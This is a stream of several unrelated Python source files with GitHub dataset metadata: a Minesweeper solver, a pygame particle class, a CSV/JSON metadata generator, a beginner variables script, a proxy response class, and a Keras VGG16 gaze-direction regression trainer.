item.adjacent_mines("m") > 0: suspicious_count = 0 for adjacent in item.adjacents(0): if adjacent.flag or adjacent.mark_mine: suspicious_count += 1 if suspicious_count != item.adjacent_mines("m"): valid = False break return valid def check_win(): global win global stage if reveal_count == row_max*column_max - mine_count: stage = "end" win = True timer_event = pygame.USEREVENT + 1 pygame.time.set_timer(timer_event, 1) def game(option): global screen global stage global win global check_list win = False done = False screen.fill(WHITE) draw_grid() autocomplete_working = True stage_done = True while not done: for event in pygame.event.get(): if event.type == pygame.QUIT: done = True if stage == "setup": if option == "c": setup(rand(0, row_max-1), rand(0,column_max-1)) stage = "play" draw_board() for row in square_list: for square in row: if not square.hidden and square.adjacent_mines("b") > 0: check_list.append(square) wait() time.sleep(1.5) if event.type == pygame.MOUSEBUTTONDOWN and option == "p": mouse_row = pygame.mouse.get_pos()[1]//square_size mouse_column = pygame.mouse.get_pos()[0]//square_size setup(mouse_row, mouse_column) stage = "play" draw_board() elif stage == "play": if event.type == pygame.MOUSEBUTTONDOWN and option == "p": mouse_row = pygame.mouse.get_pos()[1]//square_size mouse_column = pygame.mouse.get_pos()[0]//square_size button = event.button if button == 1: if square_list[mouse_row][mouse_column].hidden: square_list[mouse_row][mouse_column].reveal() else: _ = square_list[mouse_row][mouse_column].autocomplete() print(square_possibilities(square_list[mouse_row][mouse_column])) check_win() draw_board() #Left click elif button == 3: #Right click square_list[mouse_row][mouse_column].flag = not square_list[mouse_row][mouse_column].flag draw_board() print(square_possibilities(square_list[mouse_row][mouse_column])) elif option == "c" and event.type == timer_event: autocomplete_working = brute(autocomplete_working) elif stage == "end": if stage_done == True: if win == False: print("lose") # for row in square_list: # for square in row: # if square.flag: # print(square.row, square.column, "flag") else: print("win") if option == "c": for row in square_list: for item in row: if not item.flag and item.hidden: item.flag = True wait() stage_done = False # # if event.type == pygame.MOUSEBUTTONDOWN: # # done = True # # else: # if win: # text = "You Win!" # else: # text = "You Lose!" # screen.fill(BLACK) # font = pygame.font.SysFont(None, square_size) # screen.blit(font.render(text, True, WHITE), (square_size*column_max/3, square_size*row_max/3)) pygame.display.update() def square_possibilities(square): spaces = square.adjacent_mines("b") temp_list = list_possibilities(square.adjacent_mines("m") - square.adjacent_mines("f"), spaces) output_list = [] for item in temp_list: binary_string = '' for i in range(spaces): if i in item: binary_string += "1" else: binary_string += "0" output_list.append(binary_string) return output_list def convert_overlap(indexes, string): new_bin = "" for index in indexes: new_bin += string[index] return new_bin #reduce string to just overlaps def make_new_bin(overlap_indexes, possibilities): output_list = [] for bin in possibilities: new_bin = convert_overlap(overlap_indexes, bin) if new_bin not in output_list: output_list.append(new_bin) return output_list #make new list of just overlap possibilities def check_in_list(possibility_list, indexes, overlap_possibilities): count = 0 for i in range(len(possibility_list)): if convert_overlap(indexes, possibility_list[count]) not in overlap_possibilities: possibility_list.pop(count) else: count += 1 return possibility_list #Cull board_possibilities to possible lists def stuck_v2(): global check_list num_flags = 0 for row in square_list: for item in row: if item.flag: num_flags += 1 board_possibilities = square_possibilities(check_list[0]) # for item in check_list: # print(item.row, item.column, item.hidden) keys = check_list[0].adjacents(1) for key in keys: print(key.row, key.column, "key") # for key in keys: # print("keys", key.row, key.column) big_success = False for k in range(1,len(check_list)): for key in keys: print(key.row, key.column, "key") item = check_list[k] # print(item, item.row, item.column) big_overlap_indexes = [] small_overlap_indexes = [] item_adjacents = item.adjacents(1) # for adjacent in item_adjacents: # # print("adjacents",adjacent.row, adjacent.column ) item_possibilities = square_possibilities(item) print(item_possibilities, item.row, item.column) for i in range(len(keys)): for k in range(len(item_adjacents)): if keys[i] == item_adjacents[k]: big_overlap_indexes.append(i) small_overlap_indexes.append(k) #Finds which squares overlap big_overlap_possibilities = make_new_bin(big_overlap_indexes, board_possibilities) print(big_overlap_possibilities, "big overlap possibilities") small_overlap_possibilities = make_new_bin(small_overlap_indexes, item_possibilities) print(small_overlap_possibilities, "small """) overlap_possibilities = small_overlap_possibilities for bin in overlap_possibilities: if bin not in big_overlap_possibilities: overlap_possibilities.remove(bin) board_possibilities = check_in_list(board_possibilities, big_overlap_indexes, overlap_possibilities) item_possibilities = check_in_list(item_possibilities, small_overlap_indexes, overlap_possibilities) pygame.event.get() stripped_item_possibilities = [] for bin in item_possibilities: new_bin = "" for i in range(len(bin)): if i not in small_overlap_indexes: new_bin += bin[i] if new_bin not in stripped_item_possibilities: stripped_item_possibilities.append(new_bin) stripped_item_keys = [] pygame.event.get() for i in range(len(item_adjacents)): if i not in small_overlap_indexes: stripped_item_keys.append(item_adjacents[i]) new_board_possibilities = [] for bin in board_possibilities: for item_bin in stripped_item_possibilities: potential_mines = 0 new_bin = bin + item_bin check_bin = item_bin for i in range(len(big_overlap_indexes)): check_bin = check_bin[:small_overlap_indexes[i]] + bin[big_overlap_indexes[i]] + check_bin[small_overlap_indexes[i]:] if check_bin in item_possibilities: for character in new_bin: if character == "1": potential_mines += 1 if num_flags + potential_mines <= mine_count: new_board_possibilities.append(new_bin) #Check if there will be too many mines on the board # print(board_possibilities) # print(big_overlap_indexes) # print(item_possibilities) # print(small_overlap_indexes) board_possibilities = new_board_possibilities # print(new_board_possibilities) keys += stripped_item_keys # for key in keys: # print("keys", key.row, key.column) pygame.event.get() print(board_possibilities) for i in range(len(board_possibilities[0])): small_success = True number = board_possibilities[0][i] for q in range(1, len(board_possibilities)): if number != board_possibilities[q][i]: small_success = False break if small_success: big_success = True print("big_success") if number == "0": keys[i].reveal() elif number == "1": keys[i].flag = True wait() if big_success: for key in keys: print(key.row, key.column, "key") break if not big_success: random_num = rand(0, len(keys)-1) keys[random_num].reveal() print(keys[random_num].row, keys[random_num].column, "random selection") wait() print("random") game("c")
OOCam1/Minesweeper
Minesweeper.py
Minesweeper.py
py
19,511
python
en
code
0
github-code
36
8111739008
import pygame, sys from pygame.locals import * class Particle(object): #Initalizes the paritcle object (called when it is first created) def __init__(self,X,Y,size,deltaX,deltaY,color, displaySurface): #surface to display the particle on self.displaySurface = displaySurface #color to make the particle self.color = color #how fast it moves on the X axis self.deltaX = deltaX #how far it moves on the Y axis self.deltaY = deltaY #create the particle rectangle self.rectangle = pygame.Rect(X,Y, size , size) #function to draw the particle image on the displaysurface def draw(self): #draw the particle pygame.draw.rect(self.displaySurface, self.color, self.rectangle) #move the particle so it is in a #new location next time we draw self.rectangle.x = self.rectangle.x + self.deltaX self.rectangle.y = self.rectangle.y + self.deltaY def setColor(self,color): #color to make the particle self.color = color
arnavdani/Python-2015-Summer
MyClasses/Particle.py
Particle.py
py
1,136
python
en
code
0
github-code
36
18672969440
import pandas as pd import argparse import yaml import os import io import json def retrieve_params(config): with open(config) as yaml_file: params= yaml.safe_load(yaml_file) return params def generate_metadata_csv(params): excel_file_path = params["data"]["standard_excel_file"] df = pd.read_csv(excel_file_path) df.columns = [i.strip() for i in df.columns] buffer = io.StringIO() df.info(buf=buffer, verbose = True, null_counts = False, memory_usage=False) s = buffer.getvalue() s = s.split("\n") del(s[1]) s = "\n".join(s) standard_csv_meta = params["data"]["standard_csv_meta"] with open(standard_csv_meta, "a+") as f: f.write(s) f.write("\n") def generate_metadata_json(params): json_file_path = params["data"]["standard_json_file"] with open(json_file_path) as json_file: standard_dict = json.load(json_file) standard_json_meta = params["data"]["standard_json_meta"] keys1 = standard_dict.keys() for i in standard_dict["items"]: keys2 = i.keys() break b = standard_dict["items"][0]["snippet"] keys3 = b.keys() with open(standard_json_meta, "w") as meta: meta.write(str(list(keys1))) meta.write("\n") meta.write(str(list(keys2))) meta.write("\n") meta.write(str(list(keys3))) def generate_metadata(config): params = retrieve_params(config=config) generate_metadata_csv(params) generate_metadata_json(params) if __name__=="__main__": args = argparse.ArgumentParser() args.add_argument("--config", default="params.yaml") parsed_args = args.parse_args() generate_metadata(parsed_args.config)
sagar-harry/Youtube_Trending_data
generate_meta_data_file_2.py
generate_meta_data_file_2.py
py
1,708
python
en
code
0
github-code
36
24340406630
""" Variables! """ length = 20 breadth = 10 area = length * breadth print(area) # legal variables Area = 10 _area = 10 _Area = 10 area_1 = 10 area1 = 10 # python should use snake-case naming first_name = 'Akhila' print(first_name) #python basic: programming challenge: Money left in the bank after subracting all the items from bank_amount bank_amount = 100 item_one = 25 item_two = 30 item_three = 15 bank_amount = bank_amount - (item_one+item_two+item_three) print(bank_amount)
AkhilaSirikonda/Python-Project
PythonBasics/variables.py
variables.py
py
489
python
en
code
0
github-code
36
25978420324
from enum import Enum class ProxyResponseType(Enum): proxy = 'proxy' file = 'file' json = 'json' def get_dict(self): return self.value class ProxyResponse(object): def __init__(self, request, response, type: ProxyResponseType, status_code: int, headers: dict, body: any): self.request = request self.response = response self.type = type self.status_code = status_code self.headers = headers self.body = body def get_dict(self): return { 'type': self.type.value, 'status_code': self.status_code, 'headers': self.headers, 'body': self.body, }
sayler8182/MockServer
app/models/models/proxy_response.py
proxy_response.py
py
793
python
en
code
2
github-code
36
29317958483
from keras.utils.data_utils import get_file import os import numpy as np from os import listdir from os.path import isfile, join, isdir import cv2 from random import shuffle import math from keras.callbacks import TensorBoard, EarlyStopping, ModelCheckpoint, ReduceLROnPlateau, LearningRateScheduler from keras.models import Model from keras import optimizers import tensorflow as tf from keras import backend as K from keras.layers import Input, BatchNormalization, Activation, Dropout, Embedding, LSTM, Dense, Conv2D, MaxPooling2D, TimeDistributed, Flatten, concatenate, Reshape, Lambda from keras.applications.vgg16 import VGG16 import scipy.ndimage as ndimage import operator from keras.applications.vgg16 import preprocess_input # annot_path='/home/lfan/Dropbox/JointAttention/Data/annotation/' # # train_path='/home/lfan/Dropbox/JointAttention/faces/train_union/' # train_sf=[f for f in listdir(train_path) if isdir(join(train_path,f))] # validate_path='/home/lfan/Dropbox/JointAttention/faces/validate_union/' # validate_sf=[f for f in listdir(validate_path) if isdir(join(validate_path,f))] # test_path='/home/lfan/Dropbox/runCoAtt/rawData/images/separate/test/' # test_sf=[f for f in listdir(test_path) if isdir(join(test_path,f))] # # vid_set=test_sf #train_sf # # annot_sf=[join(annot_path,f) for f in listdir(annot_path) if isdir(join(annot_path,f))] # # with open('/home/lfan/Dropbox/runCoAtt/rawData/gaze_summary_test_new.txt','w') as F: # for i in range(len(vid_set)): # sf = annot_path+vid_set[i] # vid = vid_set[i] # # with open(join(sf, 'coattention.txt'), 'r') as r1: # lines = r1.readlines() # for j in range(0,len(lines),10): # list_now = lines[j].split() # frame_now = str(int(list_now[1])+1) # img_name = '/home/lfan/Dropbox/runCoAtt/rawData/images/all/' + frame_now.zfill(5) + '_' + vid + '.jpg' # # ca_xmin=float(list_now[2]) # ca_ymin=float(list_now[3]) # ca_xmax=float(list_now[4]) # ca_ymax=float(list_now[5]) # ca_x=(ca_xmin+ca_xmax)/2 # ca_y=(ca_ymin+ca_ymax)/2 # # # num_face = (len(list_now) - 2) / 4 - 1 # for k in range(num_face): # face = list_now[(6 + k * 4):(10 + k * 4)] # xmin=float(face[0]) # ymin=float(face[1]) # xmax=float(face[2]) # ymax=float(face[3]) # face_x=(xmin+xmax)/2 # face_y=(ymin+ymax)/2 # # dir_x=ca_x-face_x # dir_y=ca_y-face_y # L=math.sqrt(dir_x ** 2 + dir_y ** 2) # dir_x=dir_x/L # dir_y=dir_y/L # # # if dir_y >= 0: # # direction = math.acos(dir_x / math.sqrt(dir_x ** 2 + dir_y ** 2)) # # elif dir_y < 0: # # direction = 2*math.pi - math.acos(dir_x / math.sqrt(dir_x ** 2 + dir_y ** 2)) # # F.write(img_name+' '+str(xmin)+' '+str(ymin)+' '+str(xmax)+' '+str(ymax)+' '+str(dir_x)+' '+str(dir_y)+'\n') # with open('/home/lfan/Dropbox/runCoAtt/rawData/gaze_summary_train.txt','r') as f: # lines=f.readlines() # # for i in range(len(lines)): # list=lines[i].split() # if not isfile(list[0]): # # print(list[0]) # with open('/home/lfan/Dropbox/runCoAtt/rawData/gaze_summary_train.txt','r') as f: # lines=f.readlines() # # dir_hist=np.zeros(shape=(10,1)) # for i in range(len(lines)): # list=lines[i].split() # # dir=int(float(list[5])//(2*math.pi/10)) # if dir==10: # dir=0 # dir_hist[dir,0]+=1 # # print(dir_hist) # with open('/home/lfan/Dropbox/runCoAtt/rawData/gaze_summary_test_new.txt','r') as f: # lines=f.readlines() # with open('/home/lfan/Dropbox/runCoAtt/rawData/gaze_summary_test_flipped_new.txt','w') as f2: # for i in range(len(lines)): # list = lines[i].split() # xmin=float(list[1]) # xmax=float(list[3]) # # xmax_n=480-xmin # xmin_n=480-xmax # # dir_x=float(list[5]) # dir_y=float(list[6]) # # dir_x=-dir_x # # if dir<0.5*(2*math.pi): # # dir_n=0.5-dir # # else: # # dir_n=1.5*(2*math.pi)-dir # # f2.write(list[0]+' '+str(xmin_n)+' '+list[2]+' '+str(xmax_n)+' '+list[4]+' '+str(dir_x)+' '+str(dir_y)+' '+'f\n') # gfdatapath='/home/lfan/Dropbox/runCoAtt/vgg16/gazefollow_data/' # # with open('/home/lfan/Dropbox/runCoAtt/vgg16/gazefollow_data/annotation_test.txt','r') as f: # lines=f.readlines() # with open('/home/lfan/Dropbox/runCoAtt/vgg16/gazefollow_data/annotation_test_flipped.txt','w') as f2: # for i in range(len(lines)): # list = lines[i].split() # img=cv2.imread(join(gfdatapath,list[0])) # h, w, ch = img.shape # # xmin=float(list[1]) # xmax=float(list[3])+float(list[1]) # # xmax_n=w-xmin # xmin_n=w-xmax # w_n=xmax_n-xmin_n # # dir=float(list[9]) # if dir<0.5: # dir_n=0.5-dir # else: # dir_n=1.5-dir # # f2.write(list[0]+' '+str(xmin_n)+' '+list[2]+' '+str(w_n)+' '+list[4]+' '+list[5]+' '+list[6]+' '+list[7]+' '+list[8]+' '+str(dir_n)+' '+'f\n') batch_size=25 epochs=25 nb_train_samples=12000 # 13706 nb_validate_samples=6000 #8533 nb_test_samples=6000 model_weights_path = '/home/lfan/Dropbox/runCoAtt/new_experiment/gazedir/gazedir_finalweights.hdf5' model_path = '/home/lfan/Dropbox/runCoAtt/new_experiment/gazedir/gazedir_finalmodel.h5' tensorboard_log_dir = '/home/lfan/Dropbox/runCoAtt/new_experiment/gazedir/tb_log/' gfdatapath='/home/lfan/Dropbox/runCoAtt/vgg16/gazefollow_data/' def mygenerator(mode): if mode==1: file_name='/home/lfan/Dropbox/runCoAtt/rawData/gaze_summary_train_new.txt' #file_name_flip='/home/lfan/Dropbox/runCoAtt/rawData/gaze_summary_train_flipped.txt' #file_name_gazefollow='/home/lfan/Dropbox/runCoAtt/vgg16/gazefollow_data/annotation_train.txt' #file_name_gazefollow_flipped = '/home/lfan/Dropbox/runCoAtt/vgg16/gazefollow_data/annotation_train_flipped.txt' sample_len=nb_train_samples elif mode==2: file_name = '/home/lfan/Dropbox/runCoAtt/rawData/gaze_summary_validate_new.txt' #file_name_flip = '/home/lfan/Dropbox/runCoAtt/rawData/gaze_summary_validate_flipped.txt' #file_name_gazefollow = '/home/lfan/Dropbox/runCoAtt/vgg16/gazefollow_data/annotation_test.txt' #file_name_gazefollow_flipped = '/home/lfan/Dropbox/runCoAtt/vgg16/gazefollow_data/annotation_test_flipped.txt' sample_len=nb_validate_samples with open(file_name,'r') as reader: lines=reader.readlines() # with open(file_name_flip,'r') as reader: # lines_flipped=reader.readlines() # with open(file_name_gazefollow,'r') as reader: # lines_gazefollow=reader.readlines() # with open(file_name_gazefollow_flipped,'r') as reader: # lines_gazefollow_flipped=reader.readlines() lines=lines[0:sample_len] #lines_flipped=lines_flipped[0:sample_len] #lines[0:0]=lines_flipped # lines[0:0]=lines_gazefollow # lines[0:0]=lines_gazefollow_flipped #lines=lines[0:sample_len] shuffle(lines) shuffle(lines) cur_batch_index=0 while True: x_batch = np.zeros(shape=(batch_size, 224, 224, 3)) y_batch = np.zeros(shape=(batch_size, 2)) start_id = cur_batch_index * batch_size end_id = start_id + batch_size files_batch_now = lines[start_id:end_id] for j in range(batch_size): list_now=files_batch_now[j].split() if len(list_now)<8: img = cv2.imread(list_now[0]) # if len(list_now) == 7: # img = cv2.flip(img, 1) # cv2.imshow('flipped',img) # cv2.waitKey(0) # cv2.destroyAllWindows() xmin = int(float(list_now[1]))# - (float(list_now[3]) - float(list_now[1])) * 0) ymin = int(float(list_now[2]))# - (float(list_now[4]) - float(list_now[2])) * 0) xmax = int(float(list_now[3]))# + (float(list_now[3]) - float(list_now[1])) * 0) ymax = int(float(list_now[4]) )#+ (float(list_now[4]) - float(list_now[2])) * 0) # w = float(xmax - xmin) # h = float(ymax - ymin) # wh_list = [w, h] # max_index, max_value = max(enumerate(wh_list), key=operator.itemgetter(1)) # pad = (wh_list[max_index] - wh_list[1 - max_index]) / 2 # if max_index == 0: # ymin = ymin - pad # ymax = ymax + pad # elif max_index == 1: # xmin -= pad # xmax += pad xmin = int(max(0, xmin)) ymin = int(max(0, ymin)) xmax = max(xmin + 1, xmax) ymax = max(ymin + 1, ymax) xmax = int(min(479, xmax)) ymax = int(min(319, ymax)) #direction = float(list_now[5]) / (2 * math.pi) dir_x=float(list_now[5]) dir_y=float(list_now[6]) # print(img.shape) face = img[ymin:ymax, xmin:xmax, :] face = cv2.resize(face, (224, 224)) #face=face.astype('float32') # face[:, :, 0] -= 123.68 # face[:, :, 1] -= 116.779 # face[:, :, 2] -= 103.939 #face=(face/255)*2-1 #print(direction) #cv2.putText(face, str(direction), (10, 500), cv2.FONT_HERSHEY_SIMPLEX, 4, (255, 255, 255), 2, cv2.LINE_AA) # cv2.imshow('face',face) # cv2.waitKey(0) # cv2.destroyAllWindows() x_batch[j, :, :, :] = face y_batch[j, 0] = dir_x y_batch[j, 1] = dir_y elif len(list_now)>9: name = list_now[0] bbox_x = int(float(list_now[1])) bbox_y = int(float(list_now[2])) bbox_w = int(float(list_now[3])) bbox_h = int(float(list_now[4])) eye_x = int(np.float32(list_now[5])) eye_y = int(np.float32(list_now[6])) direction = np.float32(list_now[9]) img = cv2.imread(gfdatapath + name) if len(list_now)==11: img = cv2.flip(img, 1) h, w, ch = img.shape totop = np.abs(eye_y - bbox_y) if int(totop) == 0: totop = 10 face_h = int(2* totop) face_w = int(2 * totop) face_x = int(eye_x - totop) face_y = int(eye_y - totop) if face_x < bbox_x: face_x = bbox_x if face_y < bbox_y: face_y = bbox_y if (face_x + face_w) > (bbox_x + bbox_w): face_w = bbox_x + bbox_w - face_x if (face_y + face_h) > (bbox_y + bbox_h): face_h = bbox_y + bbox_h - face_y if face_x < 0: face_x = 0 if face_y < 0: face_y = 0 face_w=max(1,face_w) face_h=max(1,face_h) if (face_x + face_w) > w: face_w = w - face_x if (face_y + face_h) > h: face_h = h - face_y face_pro = img[face_y:(face_y + face_h), face_x:(face_x + face_w), :] face_pro = cv2.resize(face_pro, (224, 224)) face_pro=face_pro.astype('float32') # face_pro[:, :, 0] -= 103.939 # face_pro[:, :, 1] -= 116.779 # face_pro[:, :, 2] -= 123.68 face_pro = np.float32(face_pro) / 255 #direction = direction / (math.pi * 2) x_batch[j,:,:,:] = face_pro y_batch[j,0] = direction # cv2.imshow(str(direction),x_batch[j,:,:,:]) # cv2.waitKey(0) # cv2.destroyAllWindows() yield x_batch, y_batch cur_batch_index = cur_batch_index + 1 if cur_batch_index >= (len(lines) // batch_size): cur_batch_index = 0 shuffle(lines) # def myloss(y_true,y_pred): lamb=0.9 loss=lamb*tf.reduce_sum(tf.square(y_true-y_pred)) sess=tf.Session() sess.run(loss) #+(1-lamb)*tf.abs(1-tf.reduce_sum(tf.square(y_pred))) #loss= (1 - tf.matmul(y_true,y_pred,transpose_b=True)/tf.sqrt(tf.reduce_sum(tf.square(y_true))*tf.reduce_sum(tf.square(y_pred)))) #+ tf.abs(1-tf.reduce_sum(tf.square(y_pred))) # offset=np.abs(y_true-y_pred) # loss=2*((0.5-np.abs(offset-0.5))**2) return loss def lr_decay(epoch): initial_lr = 1e-3 drop = 0.8 epochs_drop = 2 lr = initial_lr * math.pow(drop, math.floor(epoch / epochs_drop)) return lr def train_model(): img_input = Input(shape=(224, 224, 3), name='img_input') # Block 1 x = Conv2D(64, (3, 3), activation='relu', padding='same', name='block1_conv1')(img_input) x = Conv2D(64, (3, 3), activation='relu', padding='same', name='block1_conv2')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x) # Block 2 x = Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv1')(x) x = Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv2')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x) # Block 3 x = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv1')(x) x = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv2')(x) x = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv3')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x) # Block 4 x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv1')(x) x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv2')(x) x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv3')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x) # Block 5 x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv1')(x) x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv2')(x) x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv3')(x) base_output = MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x) base_model=Model(inputs=img_input,outputs=base_output) base_model.trainable=True WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5' weights_path = get_file('vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5', WEIGHTS_PATH_NO_TOP, cache_subdir='models') base_model.load_weights(weights_path) output = Flatten(name='flatten')(base_output) output = Dense(4096, kernel_initializer='normal',activation='relu',name='fc1')(output) output = Dropout(0.5)(output) output = Dense(4096, kernel_initializer='normal',name='fc2')(output) output=BatchNormalization()(output) output=Activation('relu')(output) output = Dropout(0.5)(output) predict= Dense(2, kernel_initializer='normal',activation='tanh', name='predict')(output) # Create your own model mymodel = Model(inputs=img_input, outputs=predict) mymodel.summary() mycallback = [] tbCallback = TensorBoard(log_dir=tensorboard_log_dir, histogram_freq=0, batch_size=batch_size, write_graph=True, write_images=True) lrscheduler = LearningRateScheduler(lr_decay) model_checkpoint = ModelCheckpoint( '/home/lfan/Dropbox/runCoAtt/new_experiment/gazedir/checkpoint.weights.{epoch:02d}-{val_loss:.2f}.hdf5', save_best_only=False, save_weights_only=True, monitor='val_loss') mycallback.append(tbCallback) mycallback.append(model_checkpoint) mycallback.append(lrscheduler) #sgd = optimizers.SGD(lr=1e-4) mymodel.compile(optimizer='sgd', loss='mse', metrics=['mae','acc']) history = mymodel.fit_generator(mygenerator(1), steps_per_epoch=(2*nb_train_samples) // batch_size, epochs=epochs, validation_data=mygenerator(2), validation_steps=(2*nb_validate_samples) // batch_size, callbacks=mycallback) mymodel.save_weights(model_weights_path) mymodel.save(model_path) score = mymodel.evaluate_generator(mygenerator(2), (2*nb_validate_samples) // batch_size) print("Validation Accuracy= ", score[1]) def testmodel(): # img_input = Input(shape=(224, 224, 3), name='img_input') # # # Block 1 # x = Conv2D(64, (3, 3), activation='relu', padding='same', name='block1_conv1')(img_input) # x = Conv2D(64, (3, 3), activation='relu', padding='same', name='block1_conv2')(x) # x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x) # # # Block 2 # x = Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv1')(x) # x = Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv2')(x) # x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x) # # # Block 3 # x = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv1')(x) # x = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv2')(x) # x = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv3')(x) # x = MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x) # # # Block 4 # x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv1')(x) # x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv2')(x) # x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv3')(x) # x = MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x) # # # Block 5 # x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv1')(x) # x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv2')(x) # x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv3')(x) # base_output = MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x) # # output = Flatten(name='flatten')(base_output) # output = Dense(1024, activation='tanh', name='fc1')(output) # output = Dropout(0.5)(output) # output = Dense(512, activation='tanh', name='fc2')(output) # output = Dropout(0.5)(output) # output = Dense(128, activation='tanh', name='fc3')(output) # output = Dropout(0.5)(output) # predict = Dense(2, activation='tanh', name='predict')(output) img_input = Input(shape=(224, 224, 3), name='img_input') # Block 1 x = Conv2D(64, (3, 3), activation='relu', padding='same', name='block1_conv1')(img_input) x = Conv2D(64, (3, 3), activation='relu', padding='same', name='block1_conv2')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x) # Block 2 x = Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv1')(x) x = Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv2')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x) # Block 3 x = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv1')(x) x = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv2')(x) x = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv3')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x) # Block 4 x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv1')(x) x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv2')(x) x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv3')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x) # Block 5 x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv1')(x) x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv2')(x) x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv3')(x) base_output = MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x) output = Flatten(name='flatten')(base_output) output = Dense(4096, kernel_initializer='normal', activation='relu', name='fc1')(output) output = Dropout(0.5)(output) output = Dense(4096, kernel_initializer='normal', name='fc2')(output) output = BatchNormalization()(output) output = Activation('relu')(output) output = Dropout(0.5)(output) predict = Dense(2, kernel_initializer='normal', activation='tanh', name='predict')(output) # Create your own model mymodel = Model(inputs=img_input, outputs=predict) mymodel.summary() mymodel.load_weights('/home/lfan/Dropbox/runCoAtt/new_experiment/gazedir/checkpoint.weights.19-0.47.hdf5') file_name='/home/lfan/Dropbox/runCoAtt/rawData/gaze_summary_test_new.txt' sample_len=nb_test_samples with open(file_name,'r') as reader: lines=reader.readlines() lines=lines[0:sample_len] shuffle(lines) LOSS=0 cnt=0 for j in range(sample_len): list_now = lines[j].split() img = cv2.imread(list_now[0]) xmin = int(float(list_now[1])) # - (float(list_now[3]) - float(list_now[1])) * 0) ymin = int(float(list_now[2])) # - (float(list_now[4]) - float(list_now[2])) * 0) xmax = int(float(list_now[3])) # + (float(list_now[3]) - float(list_now[1])) * 0) ymax = int(float(list_now[4])) # + (float(list_now[4]) - float(list_now[2])) * 0) xmin = max(0, xmin) ymin = max(0, ymin) xmax = max(xmin + 1, xmax) ymax = max(ymin + 1, ymax) xmax = min(479, xmax) ymax = min(319, ymax) dir_x=float(list_now[5]) dir_y=float(list_now[6]) #direction = float(list_now[5]) / (2 * math.pi) # print(img.shape) face = img[ymin:ymax, xmin:xmax, :] face = cv2.resize(face, (224, 224)) #face = face.astype('float32') #face=face[:,:,::-1] # face[:, :, 0] -= 123.68 # face[:, :, 1] -= 116.779 # face[:, :, 2] -= 103.939 #face=face/255 # print(direction) # cv2.putText(face, str(direction), (10, 500), cv2.FONT_HERSHEY_SIMPLEX, 4, (255, 255, 255), 2, cv2.LINE_AA) x_batch=np.zeros(shape=(1,224,224,3)) x_batch[0,:,:,:]=face res=mymodel.predict(x_batch,batch_size=1) res=res[0] print(res) print('GT: '+str(dir_x)+' '+str(dir_y)) o_x=112 o_y=112 cv2.arrowedLine(face,(o_x,o_y),(o_x+int(res[0]*100),o_y+int(res[1]*100)),(0,0,255),5) cv2.arrowedLine(face, (o_x, o_y), (o_x + int(dir_x*100), o_y + int(dir_y*100)), (0, 255, 255), 5) cv2.imshow('face',face) cv2.waitKey(0) cv2.destroyAllWindows() LOSS+=((dir_x-res[0])**2+(dir_y-res[1])**2)/2 cnt+=1 # cv2.imshow(str(res[0])+' '+str(res[1]), face) # cv2.waitKey(0) # cv2.destroyAllWindows() print('Average loss: {}'.format(LOSS/cnt)) #train_model() testmodel()
LifengFan/Shared-Attention
src/gazemap.py
gazemap.py
py
23,892
python
en
code
4
github-code
36
69941827626
